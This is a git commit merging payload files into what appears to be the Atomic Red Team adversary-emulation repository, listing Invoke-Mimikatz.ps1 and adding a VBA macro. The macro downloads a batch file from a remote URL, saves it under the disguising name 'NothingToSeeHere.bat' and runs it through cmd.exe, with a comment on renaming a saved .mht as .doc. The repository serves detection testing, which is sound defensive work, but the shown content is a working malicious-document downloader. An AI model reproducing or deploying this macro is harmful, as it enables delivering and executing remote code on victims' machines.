Merge pull request #19 from redcanaryco/atomic-dev-cs

Atomic dev cs
2017-11-13 14:08:33 -08:00 · 2017-11-13 14:08:33 -08:00 · 7b5924d62c
parent 3380b40547 24e2671f45
commit 7b5924d62c
2 changed files with 2775 additions and 0 deletions
--- a/Windows/Payloads/Invoke-Mimikatz.ps1
+++ b/Windows/Payloads/Invoke-Mimikatz.ps1
--- a/Windows/Payloads/SampleVBAMacroDownloader.vba
+++ b/Windows/Payloads/SampleVBAMacroDownloader.vba
@ -0,0 +1,31 @@
+' Save Document As Single Web Page .mht
+' Rename Document As .Doc
+
+
+
+Sub DownloadFile()
+
+Dim myURL As String
+Dim myPath As String
+
+myURL = "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/Discovery.bat"
+
+Dim WinHttpReq As Object
+Set WinHttpReq = CreateObject("Microsoft.XMLHTTP")
+WinHttpReq.Open "GET", myURL, False, "username", "password"
+WinHttpReq.send
+
+myURL = WinHttpReq.responseBody
+If WinHttpReq.Status = 200 Then
+    Set oStream = CreateObject("ADODB.Stream")
+    oStream.Open
+    oStream.Type = 1
+    oStream.Write WinHttpReq.responseBody
+    ' Change Path HERE
+    oStream.SaveToFile "C:\Tools\NothingToSeeHere.bat", 2  ' 1 = no overwrite, 2 = overwrite
+    ' EXECUTE FROM PATH
+    Shell "cmd.exe /c C:\Tools\NothingToSeeHere.bat"
+    oStream.Close
+End If
+
+End Sub